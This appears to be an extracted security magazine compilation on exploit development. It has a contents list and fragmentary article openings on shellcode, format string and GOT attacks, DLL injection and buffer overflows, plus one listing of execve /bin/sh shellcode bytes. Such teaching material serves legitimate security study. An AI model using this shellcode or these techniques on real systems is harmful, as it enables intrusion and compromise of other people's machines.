EXploiting Software and SHELLCODE

Dear Readers,
team
Editor in Chief: Grzegorz Tabaka
grzegorz.tabaka@hakin9.org
Managing Editor: Natalia Boniewicz
natalia.boniewicz@hakin9.org
Editorial Advisory Board: Daniel Dieterle, Rebecca Wynn,
Michael Munt, Aby Rao
Proofreaders: Daniel Dieterle, Nick Baronian, Jeffrey Smith,
Robert Wood, Michael Munt, Elliott Bujan, Bob Folden,
Steve Hodge, Jonathan Edwards, Steven Atcheson,
Mixchal Jahim
Its been almost one year since the the first issue of Exploiting
Software Hakin9 was published. Exploiting Software Bible is the
effect of over ten months work and it consists of the best articles
of all Exploiting Software Hakin9 issues. It covers a wide range of
topics concerning stack overflow, shellcode, stack overflow, reverse
engineering, exploiting client software and defense patterns. I would
like to express my thanks to all without whose great assistance this
issue could not emerge. Special thanks to the authors, editorial
advisory board, proof readers, betatesters and graphics. Its your
work and fantastic enthusiasm that made it all possible.
Enjoy the reading,
Natalia Boniewicz & Hakin9 Team
Top Betatesters: Nick Baronian, Rebecca Wynn,

Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan,
Jeff rey Smith, Robert Wood, Nana Onumah, Rissone Ruggero,
Shayne Cardwell, Inaki Rodriguez, Bojan Alikavazovic,
Arnoud Tijssen
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 Expoiting Software magazine.
Senior Consultant/Publisher: Pawe Marciniak
CEO: Grzegorz Tabaka
grzegorz.tabaka@hakin9.org
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@hakin9.org
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
program
To create graphs and diagrams we used
by
Mathematical formulas created by Design Science MathType
DISCLAIMER!
The techniques described in our articles may only

be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
01/2012
CONTENTS
SHELLCODE
10 Shellcode: From a Simple Bug to OS

Control
By Amr Thaber
The secret behind any good exploit is a reliable shellcode.

The shellcode is the most important element in your
exploit. Generating shellcode with automated tools only
helps so much in formulating your exploit. Knowing how
to create your own shellcode will help you overcome
barriers that lie ahead, and thats what this article
will demonstrate.You will learn how to write a reliable
shellcode on the Win32 plaform, how to bypass the
obstacles that you will face in writing a win32 shellcode,
and how to implement your shellcode into Metasploit.
28 Exploiting Format Strings with Python

By Craig Wright
Format string attacks are not particularly new. Since

their widespread public release in 2000, format string
vulnerabilities have picked up in intensity as buffer
overflows become less common and more widely known.
From an unknown start a decade ago, they have become
a common means to exploiting system applications.
These vulnerabilities remain an issue as we still teach
them. It is not uncommon for format string vulnerabilities
to allow the attacker to view all the memory contained
within a process. This is useful as it aids in locating
desired variables or instructions within memory. With
this knowledge, an attacker can exploit the vulnerability
to successfully exploit code and even bypass control
such as Address Space Layout Randomization. In this
article Craig will discuss crafting attacks using python
in order to attack through DPA (Direct Parameter Access)
such that you can enact a 4-byte overwrite in the DTORS
and GOT (Global Access Table) and prepares the reader
for a follow-up article on exploiting the GOT and injecting
shell code.
34 DPA Exploitation and GOTs with

Python
By Craig Wright
If we can write into the GOT, we can effectively redirect

the execution flow of a program and allowing ourselves
to gain a root shell. This article is a follow-up and
second part of a look at format strings in the C and
www.hakin9.org/en
C++ programming languages; in particular, how these

may be abused. The article goes on to discuss crafting
attacks using Python in order to attack through DPA
(Direct Parameter Access) such that you can enact a 4byte overwrite in the DTORS and GOT. This time author
endeavoured to make the process of exploiting format
string vulnerabilities as simple as possible for the
inexperienced exploit developer. A basic knowledge of
Python has been assumed as well as an understanding
of the Linux operating system and how to use gdb. This
starts off with detailing the use of Direct Parameter
access and how this process works and then describes
the Global Offset Tables in detail. You will see that using
the exploitation of Direct Parameter Access (DPA) will
allow us to write into the address of our choosing.
42 Starting to Write Your Own Linux

Schellcode
By Craig Wright
We have seen more and more people become reliant on

tools such as Metasploit in the last decade. This ability to
use these tools has empowered many and has created a
rise in the number of people who can research software
vulnerabilities. It has created more security professionals
who cannot only scan a target for vulnerabilities using
a tool such as Nessus, but who can complete tests
involving system exploitations and hence validate the
results presented to them by a scanner. But, this ends
when a new application with unexpected calls or controls
is found. What do we do when presented with a special
case? This makes it extremely difficult for signature
based systems to stop or detect shellcode created for
a specific purpose and hence more likely that the tester
will succeed in testing the vulnerability without other
controls interfering. If we remain at this level, we will
stop the lower level attacker, but fail in stopping more
sophisticated attacks. You will learn how to write your
own shellcode, how to fix all the nulls and how to validate
your shellcode.
48 Beyond Automated Tools and

Frameworks: the shellcode injection
process
By Craig Wright
Automated frameworks (including Metasploit) have

simplified the testing and exploitation process. This of
CONTENTS
course comes with a price. Many penetration testers
have become tool jockeys with little understanding of
just how software functions. This script kiddie approach
to code testing does have its place. It has allowed us to
drastically increase the number of people working on
testing systems for vulnerabilities and in assessing the
risks these pose. At the same time, if these individuals
do not progress further, simply relying on the ability to
leverage the efforts of others, we will hit bottlenecks in
the creation of new tests and processes. This article is
going to follow from previous articles as well as going
into some of the fundamentals that you will need in order
to understand the shellcode creation process, how to use
Python as a launch platform for your shellcode and that
the various system components are.
54 Understanding conditionals in
shellcode
By Craig Wright
This article is going to follow from previous articles as well

as going into some of the fundamentals that you will need
in order to understand the shellcode creation process. In
this article, we are looking at extending our knowledge
of assembly and shellcoding. This is a precursor to the
actual injection and hooking process to follow. You will
investigate how you can determine code loops, the uses
of loops as well as acting as an introduction into how
you can reverse engineer assembly or shellcode into a
higher level language and even pseudo-code, all of which
forms an essential component of creating and executing
ones own exploit successfully. By gaining a deep
understanding just how code works and to know where to
find the fundamentals shellcode programming language
we hope to take the reader from a novice to being able to
create and deploy their own shellcode and exploits.
62 Taking control, Functions to DLL

injection
By Craig Wright
DLL injection is one of the most common methods

used by malware such as a rootkit to load it into the
hosts privileged processes. Once injected, code can
be inserted into functions being transmitted between
the compromised code and a library function. This
step is frequently followed with API hooking where
the malicious code is used to vary the library function
calls and returns. This article is part of a monthly series

designed to take the reader from a novice to being able
to create and deploy their own shellcode and exploits.
With this knowledge, you will learn just how easy it is for
sophisticated attackers to create code that can bypass
many security tools. More, armed with this knowledge
you will have the ability to reverse engineer attack code
and even malware allowing you to determine what the
attacker was intending to launch against your system.
BUFFER OVERFLOW
68 Smashing the Stack
By Marco Balduzzi and Mariano Graziano

For decades hackers have discovered and exploited the
most concealed programming bugs. But how is it possible
to leverage a buffer overflow to compromise software in
modern operating systems? Mariano and Marco will
introduce us to the basic principles of code exploitation.
We will see what happens when a process is executed or
terminated, and how a buffer overflow vulnerability can
be leveraged to execute malicious code.
80 Smashing the Stack 2
By Marco Balduzzi and Mariano Graziano

Modern operating systems come with sophisticated
protection
mechanisms
to
prevent
one-click
exploitations. But, how can attackers bypass such
techniques to compromise remote machines all over
the world? And downloading PDF documents is always
a safe practice?Mariano and Marco will describe
the different protection mechanisms that have been
introduced in modern operating system to make
exploitation more difficult. They will aslo present several
popular workarounds used by attacker to bypass such
techniques. Finally, they will analyze a real exploit for a
Acrobat Readers stack-based buffer overflow.
88 Exploit a Software with Buffer

Overflow Vulnerability and Bypassing Aslr
Protection
By Ahmed Sherif El-Demrdash
Buffer overflow is an anomaly where a program while

writing data to a buffer overruns the buffers boundary
and overwrites adjacent memory. This is a special case
of violation of memory safety. It is the most dangerous
vulnerability in the software world because it could allow
05/2012
CONTENTS
for an exploitation for OS which include this vulnerable
software. You will learn how to write your own exploitation
with python programming language and bypassing ASLR
protection and finally, how to run your own shellcode to
control Vulnerable OS.
REVERSE
ENGINEERING
98 Reversing EXE with OllyDbg

By Nilesh Kumar
What is reverse engineering (RE)? Normaly, the source

code is in human readable form, object files are binary
files with human-readable symbols. Executables are pure
binaries. When we attempt to revert a binary executable
into its object form, it is called disassembly. Converting
an object file into source code is called decompilation.
The whole process is called reverse engineering.
Nilesh illustrates the reverse engineering of a sample
executable file, and how to patch it. You will learn how
to reverse engineer an exe. The ultimate goal of RE is to
bypass the checks to get the things done your way. The
process of RE may differ person to person, and program
to program.
102 A Quick Hands On Introduction to

Packing
By Alain Schneider
On Windows systems, programs are usually available in

the PE file format with the EXE extension. Although this
file format is quite complex, it is now well documented,
so understanding how it is globally supposed to work is
pretty easy and you can find a lot of programs designed
to open/analyze/modify PE executables. Those which are
designed to modify PE files are often called packers. In
this article we will learn how to write one of them.
110 Hacking Applets: A Reverse

Engineering Approach
By Nilesh Kumar and Ronnie Johndas
Ronnie and Nilesh will discuss a technique that can

be used to modify the applets Java byte code without
having to recompile the applet. They will show the
process of reverse engineering of an applet which does
not have any kind of code obfuscation, string encryption
and other code protection techniques employed. You will
www.hakin9.org/en
learn how to patch byte code and perform other kinds of

manipulation in the Java class files of the applet. We will
also see how to get a signed applet to run in a standalone
manner.
EXPLOITING CLIENT
SOFTWARE
116 Hijacking Software Updates with

Evilgrade
By Mourad Ben Lokhua
Almost every modern application comes with a simple,

built-in update mechanism. Usually it is sensible for
users to accept updates that improve the security and
operation of the program. Mourad shows how to attack
usersvia update systems. He also claims that software
developers do not spend much time or effort on updates
and secure delivery mechanisms, thats why standard
processes for updating applications make many users
vulnerable.
122 Direct Object Reference or, How a

Toddler Can Hack Your Web Application
By Nick Nikiforakis
There is no point in denying that everyday software

is steadily moving from desktop applications to Web
applications. When you can check your mail, play games,
create documents and file your tax report without ever
leaving your browser, then you are indeed a citizen of the
Web. In this era, many miscreants have changed their
game. Its easier for them to impersonate you or steal
your private data from a vulnerable Web application than
to take control of the Extended Instruction Pointer (EIP)
register of your CPU. In this article we will investigate
one type of Web application vulnerability, namely Direct
Object Reference. A Direct Object Reference occurs
when an identifier, used in the internal implementation of
a Web application, is exposed to users. When this is done
insecurely, it can lead to a lot of trouble
128 How to Recover Passwords from a

Memory Dump
By Daniel Dieterle
Malware analysis is an amazing field. To be able to grab

a memory dump from a live machine and then have the
capabilities to pull useful information from it just amazes the
CONTENTS
author. Can we find pertinent system settings, and even pull
information from them? Were you ever curious about what
could be done with a memory dump of an active computer?
This article is a short demonstration on how to acquire a
memory dump from a running system, and then how to use
tools to not only recover the system password hashes from
the memory dump, but also how to decode them.
134 Creating a Fake Wi-Fi Hotspot to

Capture Connected Users Information
By Roberto Saia
We can use a standard laptop to create a fake open

wireless access point that allows us to capture a large
amount of information about connected users; in certain
environments, such as airports or meeting areas, this
kind of operation can represent an enormous security
threat but, on the other hand, the same approach is a
powerful way to check the wireless activity in certain
areas where the security is very important. An attacker
can use his properly configured laptop in a large number
of public places, even in an airplane, simulating the WiFi gateway used by airline and capturing personal data
of connected passengers. With a little effort, anyone can
create a fake Wi-Fi Hotspot and use it to gather precious
information about connected users, information such as
usernames, passwords, messages and so on. You see
how an attacker can deceive a large number of users,
and consequently capture information that enables him
to commit criminal acts such as identity theft.
142 Deceiving Defenses with Nmap

Camouflaged Scanning
By Roberto Saia
Nmap (contraction of Network Mapper) is an opensource software designed to rapidly scan both single
hosts and large networks. To perform its functionalities
Nmap uses particular IP packets (raw-packets) in order
to probe what hosts are active on the target network:
about these hosts, it is able to discover the running
services (type and version), the operating system in
use (type and version); it is also able to obtain more
advanced information, such as, for example, the type of
firewall used on the target network. You will learn how to
deceive an IDS/IPS system through a particular feature
offered by Nmap software, a simple option able to trick
the rules generally used in this kind of systems to detect
any suspect activity inside a medium/large network; the

used software is the most famous network scanner in the
world and the knowledge of its potentiality is a good way
to improve our security policies.
150 Overriding Function Calls in Linux

By Umair Manzoor
Function hooking and overriding plays a vital role

in penetration test of thick client application. In this
article we will discuss how shared libraries in Linux
environment can be overridden with out recompiling
the code. By overriding the function calls we can sniff
the communication protocol, modify the communication
parameters and fuzz the communication protocol.
156 Cracking Java Applications with AOP

exploits (part 1)
By Daniel Drozdzewski
Aspect Oriented Programming is a paradigm that aims

to modularise software further by the separation of
crosscutting concerns. Daniel will show us the basics of
AOP and a simple, yet powerful idea behind the exploit.
160 Cracking Java Applications with AOP

Exploits (part 2)
By Daniel Drozdzewski
AOP has been used in the domain of Software Security

before. Its use was mainly for validation, auditing and
authorization purposes, which in turn improve software
security as a whole. Those crosscutting concerns are
being woven into the existing software after the fully
functional code has been delivered. Making the process
two staged, allows separating the responsibilities.In the
second part of the series, Daniel will present the reader
with a bit more advanced use of AOP, which will allow
us to reverse engineer obfuscated Java applications.
On top of that he will show a trick of password post
selection, which we use to find parts of the code crucial
to password processing, which in turn will allow us to
switch the whole password verification off.
166 Cisco IOS Rootkits and Malware: A

practical guide
By Jason Nehrboss
Propagating the worm code into a new router can either

be quite easy, difficult, or impossible. There are many
05/2012
CONTENTS
variations of supported IOS code and hardware platforms.
The author discusses the use of and demonstrates an
IOS Embedded Event Manager rootkit and worm. When
a router is infected it can be leveraged into a powerful
malware platform. Capabilities demonstrated are network
packet captures, reverse shell connections, a spam
module, and a mini malware httpd server leveraged with
ip address hijacking. In this article you will learn how to
exploit critical network devices, network traffic traversing
these devices and act as a launch point for further attacks
into a network You will also learn about a self replicating
IOS worm with stealth features and self defense
mechanisms, all with platform independent code.
DEFENSE
180 Easy Network Security Monitoring

with Security Onion
By Daniel Dieterle
Hackers and the malware that they create are getting

much better at evading anti-virus programs and firewalls.
So how do you detect or even defend against these
advanced threats? Intrusion Detection Systems monitor
and analyze your network traffic for malicious threats.
The problem is that they can be very difficult to configure
and time consuming to install. Some take hours, days or
even weeks to setup properly. The Security Onion IDS
and Network Security Monitoring system changes all of
that. Do you have 10 minutes? That is about how long
it takes to setup and configure Security Onion a Linux
Security Distribution based on the Ubuntu (Xubuntu
10.04 actually) operating system.
186 Inspecting Https Traffic on Gateways

By Kishin Fatnani
In the past, security devices inspecting application

content for attack patterns, misuse or malware, had been
blind to encrypted traffic and because of this, encrypted
protocols such as Hypertext Transfer Protocol Secure
(HTTPS) have been a safe method used by attackers
to bypass security inspection. Though reverse proxies
and Web Server modules have been there for long, they
only inspect incoming traffic e.g. connections made to
protected web servers in the organization. Inspecting
outgoing traffic or traffic of connections made by users
to outside world servers not protected by the device, had
been on the wish lists. These days, devices come with the
www.hakin9.org/en
capability to inspect Secure Sockets Layer (SSL) based

outgoing traffic, however there are some concerns by
enabling such kind of inspection. In this article we cover
some basics of SSL, the challenges in inspecting SSL
traffic, and also see how Check Points HTTPS Inspection
feature is able to inspect HTTPS traffic at the gateway.
After reading this article you will know the pros and cons
of enabling SSL inspection on a gateway.
192 Detecting Ipv6 Rogue Router

Incidents Using Bro NSM
By Matti Mantere
Internet Protocol version 6 (IPv6) has been a long time

coming. As the protocol is making its entrance several
security risks of varying criticality are known to exist.
However, the amount of skilled personnel needed to
assure the security of IPv6 network deployment as well
as awareness of the said risks remains woefully low.
As IPv6 migration slowly gains momentum, situations
where administrators responsible for deployment of
network equipment have very poor knowledge and nonexistent operational experience of the new protocol are
unavoidable. Matti depicts one method for detecting them
using open source Bro NSM. Bro Network Security Monitor
(Bro NSM) is a flexible open source network analysis
framework that is freely distributed under BSD license.
196 The Gentoo Hardened Project:

Or How to Minimize Exploits Risks
By Jesus Rivero
Gentoos approach to Linux is evidenced in its

Phylosophy1, from there it derives the fact that
optimization, flexibility and choices are the keystones of
the distribution. Gentoo gives users the tools needed for
them to shape their Gentoo installation to their liking and
all while building and compiling software especially for
their hardware architecture, not relying in pre-built binaries
compiled by someone else. That is one of the reasons why
you will hear, users and developers, say that Gentoo is
a meta-distribution because the distribution provides
exciting tools that allow users, using the same base
system, to build highly secure servers, neat desktops,
embedded solutions or even a special VDR system. Jesus
will show you how to install a Gentoo Hardened system,
how to choose the right profile and kernel and what are the
major caveats and potential problems.
SHELLCODE
Shellcode:
From a Simple Bug to OS Control
The secret behind any good exploit is a reliable shellcode. The
shellcode is the most important element in your exploit. Generating
shellcode with automated tools only helps so much in formulating
your exploit. Knowing how to create your own shellcode will help
you overcome barriers that lie ahead, and thats what this article will
demonstrate.
n this article Im going to teach you how to write a

reliable shellcode on the Win32 plaform, how to
bypass the obstacles that you will face in writing a
win32 shellcode, and how to implement your shellcode
into Metasploit.
Part 1: The Basics

Whats Shellcode?
Shellcode is simply a portable native code. This

code has the ability to run at any place in memory,
for example, inside an exploit to connect back to the
attacker or do what the attacker needs to do.
The Three Types of Shellcode
Shellcode is classified by the limitations of the

environment that you are facing while crafting a program
to exploit a specific vulnerability.
Null Byte-Free Shellcode
In this type of shellcode, you are forced to write a
shellcode without any null byte. For example, while
exploiting a vulnerability in a string manipulation
code inside a function, C functions such as strcpy()
or sprintf() work by searching for the null byte in the
string (as strings are null terminated) without checking
on the maximum accepted length of this string. A
successful byte-free shellcode will make this application
Figure 1. Shellcode Skeleton
10
susceptible to the buffer overflow vulnerability. If your

shellcode contains a NULL byte, this byte will be
interpreted as a string terminator, with the result that the
program accepts the shellcode in front of the NULL byte
and discards the rest. So you will have to avoid any nullbyte inside your shellcode, but you will have the ability
to use just one null byte the last byte.
Alphanumeric Shellcode:
In strings, its not common to see strange characters
or Latin characters inside. In this case, some IDSs
(Intrusion detection systems) detect these strings as
malicious especially when they include suspicious
sequence of opcodes. These systems could detect the
presence of shellcode. Not only that, but also some
applications filter the input string and accept only the
normal characters and numbers (a-z, A-Z and 0-9).
In this case, you need to write your shellcode in
characters. You are forced to use only these characters
and only accept bytes from 0x30 to 0x39 and from 0x40
to 0x5A and from 0x60 to 0x7A.
Egg-hunting Shellcode
In some vulnerabilities, you may have a very small
buffer to insert your shellcode. With the off-by-one
vulnerability, you are restricted to a specific size and
you cant send a shellcode bigger than that.
Alternatively, you could use two buffers to put your
shellcode into. One is for your real shellcode and the second
is for attacking and searching the first buffer for the eggs.
Part 2: Writing Shellcode

Shellcode Skeleton
Any shellcode consists of four parts: Getting the delta,

getting the kernel32 imagebase, getting your APIs and
the payload.
01/2012
SHELLCODE
Exploiting format
Strings with Python
In this article we will look at format strings in the C and C++
programming languages. In particular, how these may be abused.
he article progresses to discuss crafting attacks

using python in order to attack through DPA
(Direct Parameter Access) such that you can
enact a 4-byte overwrite in the DTORS and GOT
(Global Access Table) and prepares the reader for a
follow-up article on exploiting the GOT and injecting
shell code. We demonstrate how these simple but still
often overlooked and even taught vulnerabilities can be
used to read arbitrary locations from memory, write to
memory and execute commands and finally to gain a
shell.
Introduction
Format string attacks are not particularly new. Since

their widespread public release in 2000, format string
vulnerabilities have picked up in intensity as buffer
overflows become less common and more widely
known. From an unknown start a decade ago, they
have become a common means to exploiting system
applications. These vulnerabilities (We can see from
2010-06-30: KVIrc DCC Directory Traversal and
Multiple Format String Vulnerabilities, that format string
vulnerabilities have not disappeared and are still a valid
topic today.) remain an issue as we still teach them.
We will start by explaining what a format string
actually is and then why they can be exploited.
It is not uncommon for format string vulnerabilities
to allow the attacker to view all the memory contained
within a process. This is useful as it aids in locating
desired variables or instructions within memory. With
this knowledge, an attacker can exploit the vulnerability
to successfully exploit code and even bypass control
such as Address Space Layout Randomization
(ASLR).
When a parent process starts, the addressing for
that process as well as all subsequent child process in
28
most implementations will remain static throughout the

lifetime of the process. Although an attack may crash
a child process, the parent process is often left intact.
Consequently, attacks against child processes that
cause a crash of the particular thread or fork may return
useful information. This is particular true when multiple
format string attacks can be leveraged against child
processes that respond themselves without crashing
the parent application.
Many Linux implementations incorporate a processlimit in order to limit the number of re-spawns and this
can help minimize the impact of the attack noted above
by enforcing an RLIMIT_NPROC rlimit (resource limit) of a
process through the Linux kernel. In this event, where
the executable attempts to fork and a greater number
of forks would come into existent than are defined by
RLIMIT_NPROC processes, the fork fails. The Linux kernel
module, rexFBD when installed, detects excessive forking
and stops these.
The end result is that memory leaks including format
string vulnerabilities can act as a means of locating
particular libraries and variables within a running
process. The location of both stack and heap variables
may be determined. From this, the attacker can discover
the structures contained within a program.
What is a Format String?
Not all security people are programmers and

consequently we need to start by defining what a
format string is. Any format string is basically a set of
special parameters that define how to display a variable
number of arguments, for instance when sending a
string of data to stdout. A format string essentially exists
to define a variable length of arguments.
Format strings are primarily known in the C family of
languages but are also used by Perl, PHP, and even
01/2012
SHELLCODE
DPA Exploitation
and GOTs with Python
This article is a follow-up and second part of a look at format strings
in the C and C++ programming languages; in particular, how these
may be abused. The article goes on to discuss crafting attacks using
Python in order to attack through DPA (Direct Parameter Access)
such that you can enact a 4-byte overwrite in the DTORS and GOT
(Global Access Table).
t then continues the attack by exploiting the GOT

and injecting shell code. We demonstrate how these
simple but still often overlooked and even generally
accepted vulnerabilities can be used to read arbitrary
locations from memory, write to memory, execute
commands, and, finally, to gain a shell.
Introduction
In the first part of this article (presented in Hakin9

in Exploiting Software 2/2011), we discussed format
string attacks. In this article we are going to extend
these, beginning with DPA (Direct Parameter Access)
and moving to using the GOT (Global Offset Table) to
spawn a root shell. To gain a complete understanding of
this process, it is recommended that part one from last
months issue is read first.
In this paper, we have endeavoured to make the
process of exploiting format string vulnerabilities
as simple as possible for the inexperienced exploit
developer. A basic knowledge of Python has been
assumed as well as an understanding of the Linux
operating system and how to use gdb. This starts off
with detailing the use of Direct Parameter access and
how this process works and then describes the Global
Offset Tables in detail.
If we can write into the GOT, we can effectively
redirect the execution flow of a program and allowing
ourselves to gain a root shell. This process will also help
when there is some form of stack protection that stops
us from altering the address pointed to through EIP and
redirecting it to a shellcode address.
In this process, we will inject a reference in place of
that which the GOT references for a selected function.
Here we want to have a function that can execute
system commands as substitutes to overwriting the
subsequent instruction with the memory address that
34
the shellcode we wish to call. The modern protections

built into nearly all operating systems have started
to load the GOT in a read-only memory area. Where
this has occurred, the system avoids the exploitation
technique discussed in this paper to a large extent.
That being said, it is possible to find systems where
these protections have been disabled or older
unpatched systems where the complete attacks work
natively. At worst, even in a read-only system, the
GOT can be read.
Direct Parameter Access
DPA allows an attacker to access arguments through

the use of a $ qualifier. Just like we had to learn all
of that difficult math before we moved into formulaic
integrals in high school, last lesson we learned the hard
way to call arguments using format strings. DPA makes
format string attacks simple. It allows us to directly call
the location we wish to exploit instead of having to pad
attacks using %x%x%x Basically, as we can address the
argument directly, we do not have to increment the
byte count until we find the memory location we wish
to exploit.
We showed in the last article how the use of the
following syntax will allow us to access the 8th argument
from the stack (%8\$x%8\$n) using the $ qualifier. Again,
Figure 1. What Happened To 100?
01/2012
SHELLCODE
Starting to
Write Your Own Linux Shellcode
We have seen more and more people become reliant on tools such
as Metasploit in the last decade. This ability to use these tools has
empowered many and has created a rise in the number of people
who can research software vulnerabilities.
t has created more security professionals who

cannot only scan a target for vulnerabilities using
a tool such as Nessus, but who can complete tests
involving system exploitations and hence validate
the results presented to them by a scanner. But, this
ends when a new application with unexpected calls
or controls is found. What do we do when presented
with a special case? Here we have to again return to
the old art of crafting shellcode. At some stage, if we
are to be more than white hat script kiddies and want
to come to actually understand the application, we
need to learn how to craft our own custom shellcode.
In this article, we start to explain the process used to
do this.
Introduction
We have seen more and more people become reliant

on tools such as Metasploit in the last decade. There
are valid reasons for this. Simplifying the validation
process had made it far easier to check and confirm
that vulnerabilities discovered using a scanner such as
Nessus can actually be exploited by an attacker and
are not simply another false positive. It is far too easy to
report on vulnerabilities that do not exist and the ability to
verify that holes can actually be exploited is an essential
aspect of testing a systems security. To understand risk,
we need to know the real level of exploitability. Without
this, we are simply guessing.
The capability to use these tools has empowered
many professionals and has created a rise in the number
of people who can research software vulnerabilities. It
has created more security professionals who cannot
only scan a target for vulnerabilities using a tool such as
Nessus, but who can complete tests involving system
exploitations and hence validate the results presented
to them by a scanner. It is in effect a leg-up and a means
42
to quickly gain a foothold into the world of security. What

needs to be remembered in this however is that it is just
a foothold. To continue to grow in this industry, you need
to continuously improve and learn. The ability to gain
access and validate simple exploits is important, but it
is only the start.
This ends when a new application with unexpected
calls or controls is found. What do we do when presented
with a special case? Here we have to again return to the
old art of crafting shellcode. In this article, we will start to
look at how to write effective shellcode. POC (Proof of
Concept) situations frequently require one-off solutions.
In these cases the tester or researcher really needs
to be able to create their own shellcode to meet the
demands imposed at the time.
Add to this the rapid rate at which shellcode such
as that in the Metasploit Project can become obsolete
and you start to see the need to create your own
custom shellcode. Shellcode you create yourself will
not be incorporated into any anti-malware signature
databases or IDS (Intrusion detection system. This
can incorporate both HIDS (or host based IDS) as well
as NIDS (or network based systems)) signature match
lists. More importantly, the ability to write your own
shellcode allows one to learn the internal functioning
of a system and the assembly calls better than any text
book could do.
At some stage, if we are to be more than white hat
script kiddies and want to come to actually understand
the application we need to learn how to craft our own
custom shellcode. In this article, we start to explain the
process used to do this.
Why Create shellcode?
Shellcode can be complex. To effectively write

shellcode, you need to understand what the system
01/2012
SHELLCODE
Beyond Automated
Tools and Frameworks: the shellcode injection process
This article is going to follow from previous articles as well as
going into some of the fundamentals that you will need in order to
understand the shellcode creation process, how to use Python as
a launch platform for your shellcode and that the various system
components are.
his is designed as a precursor to the actual

injection process where we will in a later article
next month introduce the actual injection process
and start to move from automatic exploit frameworks
(such as Metasploit) into being able to create and
execute ones own exploit successfully. In order to do
this, we need to start understanding just how code
works and to know where to find the fundamentals of
the Python programming language. This article will
start a monthly series designed to take the reader from
a novice to being able to create and deploy their own
shellcode and exploits.
Introduction
Automated frameworks (including Metasploit) have

simplified the testing and exploitation process. This of
course comes with a price. Many penetration testers
have become tool jockeys with little understanding of
just how software functions. This script kiddie approach
to code testing does have its place. It has allowed us to
drastically increase the number of people working on
testing systems for vulnerabilities and in assessing the
risks these pose. At the same time, if these individuals
do not progress further, simply relying on the ability to
leverage the efforts of others, we will hit bottlenecks in

the creation of new tests and processes.
In previous articles, we have covered a number of
topics to do with the creation of shellcode. In this one
we shall start to introduce the means that will allow
the tester to use that code without having to rely on
an external framework. Frameworks do allow for the
simpler sharing of code, but also limit us at the same
time. They lock the tester into selected platforms. More,
attacks in the wild have and are moving further away
from the automated framework and the tester needs
to be able to anticipate and simulate this to remain as
effective.
In subsequent articles this will be expanded into the
creation of standalone exploit kits.
In order to do this, we also need to take a step
back and explain the system and the tools we will
use in more detail. To achieve this, we will start
with describing the various components that are
used and to providing an introduction to the Python
programming language. This will also extend into a
simple method to analyse shellcode using GCC such
that we can come to understand what the shellcode
others have created is designed to do. This is a useful
Listing 1. Shellcode sample (This sample of shellcode has been taken from Zillion (2002). This page goes into detail as to the operation
of the shellcode and the reader is encouraged to step through this. The reader will nd countless many examples online with a simple
Google search and many good examples are also included within the Metasploit framework.)
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"
"\x42\x42\x42\x42";
48
01/2012
Atola Insight
Thats all you need for data recovery.
Atola Technology offers Atola Insight the only data recovery device that covers
the entire data recovery process: in-depth HDD diagnostics, firmware recovery,
HDD duplication, and file recovery. It is like a whole data recovery Lab in one Tool.
This product is the best choice for seasoned professionals as well as start-up data
recovery companies.
Case management
Real time current monitor
Firmware area backup system
Serial port and power control
Write protection switch
SHELLCODE
Taking Control,
Functions to DLL injection
This article is going to follow from previous articles as well as
going into some of the fundamentals that you will need in order to
understand the code exploitation process. In this article we look at
one of the primary infection steps used to compromise a Windows
host, DLL injection.
LL injection is one of the most common methods

used by malware such as a rootkit to load it into
the hosts privileged processes. Once injected,
code can be inserted into functions being transmitted
between the compromised code and a library function.
This step is frequently followed with API hooking where
calls and returns.
This article is part of a monthly series designed to
take the reader from a novice to being able to create
and deploy their own shellcode and exploits.
use in more detail. To achieve this, we will start with

describing the various components that are used and
to providing an introduction to the Python programming
language. This will also extend into a simple method to
analyse shellcode using GCC such that we can come
to understand what the shellcode others have created
is designed to do. This is a useful skill when reversing
malware as well as a good way to learn from the
existing code base and even to leverage some of the
various tools that are freely available already.
Introduction
A DLL is a Dynamically Linked Library of executable

code (Shewmaker, 2006). Code libraries are important
as they allow developers to reuse common functions. It
is firstly inefficient and not economical to rewrite of the
same section of code over and over. More importantly,
when the same code is replicated in many blocks it
becomes more difficult to patch or update software.
In addition, standardized libraries allow developers
to reuse set functions rather than having to recode
them and hence reinvent the wheel each time they
develop a program. It is important to note that the best
programmers make mistakes. Whenever they have
to recode the same material the chances of an error
increase.
A DLL can reference a common function allowing the
programmer to just learn the call needed rather than
having to rewrite create their own. In this, the code
would reference the external function using the DLL
which is loaded into memory for use by the program. In
this article we will be discussing DLLs are loaded into a
running memory process. This is a feature of Windows
and not a bug. That said, many features also lead to
exploitations.
In previous articles, we have covered a number of

topics to do with the creation of shellcode and assembly
language. We continue with an introduction of one
of the primary exploitation processes used against a
Windows system. In subsequent articles this will be
expanded into the creation of standalone exploit kits
and in the deployment of a rootkit.
In this article we look at one of the primary infection
steps used to compromise a Windows host, DLL
injection. This process is used by attackers and is also
incorporated into automated frameworks (including
Metasploit) as a part of the testing and exploitation
process. DLL injection is one of the more common
methods used by malware such as a rootkit to load
it into the hosts privileged processes. Once injected,
code can be inserted into functions being transmitted
between the compromised code and a library function.
This step is frequently followed with API hooking where
calls and returns.
In order to do this, we also need to take a step
back and explain the system and the tools we will
62
What is a DLL?
01/2012
BUFFER OVERFLOW
Smashing the Stack

For decades hackers have discovered and exploited the most
concealed programming bugs. But how is it possible to leverage
a buffer overflow to compromise software in modern operating
systems?
his article will introduce the reader to the basic

principles of code exploitation. We will see what
happens when a process is executed or terminated,
and how a buffer overflow vulnerability can be leveraged
to execute malicious code. Our analysis has been based
on the Intel Architecture 32 bit (IA 32) as it represents the
main target for hackers and worms. Our code and tools
